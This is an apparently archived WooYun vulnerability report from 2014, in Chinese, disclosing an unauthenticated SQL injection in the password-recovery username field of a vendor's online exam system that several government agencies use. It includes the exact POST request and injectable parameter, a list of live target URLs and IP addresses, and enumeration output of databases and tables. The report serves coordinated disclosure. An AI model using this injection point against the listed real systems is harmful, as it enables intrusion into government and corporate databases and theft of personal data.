当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073996

漏洞标题:某在线考试系统SQL注入(无需登录,多家政府网站躺枪)

相关厂商:cncert国家互联网应急中心

漏洞作者: PythonPig

提交时间:2014-08-27 16:21

修复时间:2014-11-25 16:22

公开时间:2014-11-25 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-04: 细节向第三方安全合作伙伴开放
2014-10-26: 细节向核心白帽子及相关领域专家公开
2014-11-05: 细节向普通白帽子公开
2014-11-15: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

某在线考试系统SQL注入(无需登录,多家政府网站躺枪)

详细说明:

深圳市标驰信息技术有限公司的企慧通在线考试系统,问题出在登录界面的密码找回时,用户名存在注入,多家政府网站使用该系统,同时还有不少企业也在使用。
0x00:先来看看用这个系统的客户吧

客户副本.jpg

客户1副本.jpg


0x01:下面先以“淄博市食品药品监督管理局”的考试系统为例进行说明,系统登录url:http://222.134.129.66:800/Initial/Login.aspx,点击“忘记密码”,输入用户名(随意输入)和邮箱(格式要正确)抓包,tbxName存在注入。POST内容如下

POST /SystemSettings/GetPassword.aspx HTTP/1.1
Host: 222.134.129.66:800
Proxy-Connection: keep-alive
Content-Length: 214
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://222.134.129.66:800
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://222.134.129.66:800/SystemSettings/GetPassword.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,de;q=0.6,en;q=0.4,zh-TW;q=0.2
__VIEWSTATE=%2FwEPDwULLTIxMDI1ODg3NTRkZNReylXAnjzPySReVFR5490Zn0Qt&__EVENTVALIDATION=%2FwEWBALigb6qCQLYjqm5AgKQoJfyDwLoqPvEByHEU498As1qKY82qpKAxVejL96y&tbxName=abc&tbxEmail=abc%40126.com&bgSubmit=%E7%A1%AE%E5%AE%9A


0x02:注入点基本情况,都是root权限

注入点.JPG


0x03:直接跑数据库(可跨库)

databases.JPG


0x04:再来看看tables

tables.JPG

内容就不跑了,毕竟他们都是国家公务员啊
0x05:来几个案例吧
http://edu.huiboit.com/Initial/Login.aspx
http://222.134.129.66:800/Initial/Login.aspx
http://42.120.7.132/Initial/Login.aspx
http://202.110.193.15:82/initial/login.aspx
http://www.hcrtg.com/Initial/Login.aspx

漏洞证明:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
Database: study
[71 tables]
+---------------------------------------+
| 1211zb_printinfo |
| 1211zb_printset |
| dk_config |
| dk_emailsetting |
| dk_jifeninfo |
| dk_setview |
| dk_teacherinfo |
| dk_type |
| dk_typelist |
| dk_userloginlog |
| dk_videoinfo |
| dk_videorecord |
| dk_videowareinfo |
| dk_wordinfo |
| dk_wordrecord |
| e_arrange |
| e_arrange_apply |
| e_arrange_limit |
| e_exam |
| e_exam2 |
| e_exam_sheet |
| e_examclass |
| e_sweep |
| e_sweep_exam |
| e_sweep_examclass |
| e_sweep_record |
| e_sweep_type |
| e_type |
| z_answers |
| z_answers_msg |
| z_answers_user |
| z_authorize |
| z_checkrigester |
| z_companyinfo |
| z_contact |
| z_contacttype |
| z_course |
| z_course_apply |
| z_course_assign |
| z_course_comment |
| z_course_recommend |
| z_course_type |
| z_courseware |
| z_friend |
| z_friendinvite |
| z_friendtype |
| z_keep |
| z_menus |
| z_menus_company |
| z_menus_parent |
| z_menus_role |
| z_message |
| z_message_receive |
| z_message_restore |
| z_notify |
| z_plan |
| z_require |
| z_role |
| z_section |
| z_share |
| z_student_teacher |
| z_studyrecord |
| z_sub_vote |
| z_sysadmin |
| z_sysadmin_operate |
| z_user_operate |
| z_userdetail |
| z_userinfo |
| z_userrecord |
| z_vote |
| z_vote_user |
+---------------------------------------+
Database: study_20130426
[71 tables]
+---------------------------------------+
| 1211zb_printinfo |
| 1211zb_printset |
| dk_config |
| dk_emailsetting |
| dk_jifeninfo |
| dk_setview |
| dk_teacherinfo |
| dk_type |
| dk_typelist |
| dk_userloginlog |
| dk_videoinfo |
| dk_videorecord |
| dk_videowareinfo |
| dk_wordinfo |
| dk_wordrecord |
| e_arrange |
| e_arrange_apply |
| e_arrange_limit |
| e_exam |
| e_exam2 |
| e_exam_sheet |
| e_examclass |
| e_sweep |
| e_sweep_exam |
| e_sweep_examclass |
| e_sweep_record |
| e_sweep_type |
| e_type |
| z_answers |
| z_answers_msg |
| z_answers_user |
| z_authorize |
| z_checkrigester |
| z_companyinfo |
| z_contact |
| z_contacttype |
| z_course |
| z_course_apply |
| z_course_assign |
| z_course_comment |
| z_course_recommend |
| z_course_type |
| z_courseware |
| z_friend |
| z_friendinvite |
| z_friendtype |
| z_keep |
| z_menus |
| z_menus_company |
| z_menus_parent |
| z_menus_role |
| z_message |
| z_message_receive |
| z_message_restore |
| z_notify |
| z_plan |
| z_require |
| z_role |
| z_section |
| z_share |
| z_student_teacher |
| z_studyrecord |
| z_sub_vote |
| z_sysadmin |
| z_sysadmin_operate |
| z_user_operate |
| z_userdetail |
| z_userinfo |
| z_userrecord |
| z_vote |
| z_vote_user |
+---------------------------------------+

修复方案:

过滤过滤再过滤

版权声明:转载请注明来源 PythonPig@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-01 09:48

厂商回复:

对于所述案例及漏洞通用性,CNVD仍然在确认复现过程。先行确认,待后续处置。

最新状态:

暂无